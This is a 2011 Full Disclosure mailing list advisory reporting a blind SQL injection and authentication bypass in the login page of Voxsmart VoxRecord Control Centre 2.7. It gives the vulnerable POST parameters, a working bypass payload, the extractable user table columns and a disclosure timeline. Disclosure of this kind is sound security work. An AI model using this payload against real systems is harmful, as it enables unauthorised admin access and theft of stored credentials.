Full Disclosure mailing list archives
Voxsmart VoxRecord Control Centre - Blind SQLi and auth. bypass
From: Piotr Duszynski <piotr () duszynski eu>
Date: Wed, 30 Nov 2011 13:06:39 +0100
======================================================================= VoxRecord Control Centre - version 2.7 Blind SQLi and auth. bypass ======================================================================= Affected Software : Voxsmart - VoxRecord Control Centre v. 2.7 Severity : Critical Local/Remote : Remote Author : Piotr Duszynski @drk1wi [Summary] A blind sqli exists in /vcc/login.php login page. This can be used either for authentication bypass (admin privileges gained) or login:pass extraction from the 'voxsuser' database table. [Vulnerability Details] HTTP POST :/vcc/login.php admin_un=adm[ BLIBD SQL INJECTION]&admin_pw=adddm - Authentication bypass: set admin_un to "admin'%20or%201%3d1--" - Blind SQLi data extraction: 'voxsuser' table columns +-------------------------+----+----------------------------+-----------------------------------------------+------------+------------+ | email | id | is_loged | password | user_type | username | +-------------------------+----+----------------------------+-----------------------------------------------+------------+------------+ [Time-line] 1/10/2011 - Vendor notified ??? - Vendor response ??? - Vendor patch release 30/11/2011 - Public disclosure Cheers, @drk1wi _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Voxsmart VoxRecord Control Centre - Blind SQLi and auth. bypass Piotr Duszynski (Nov 30)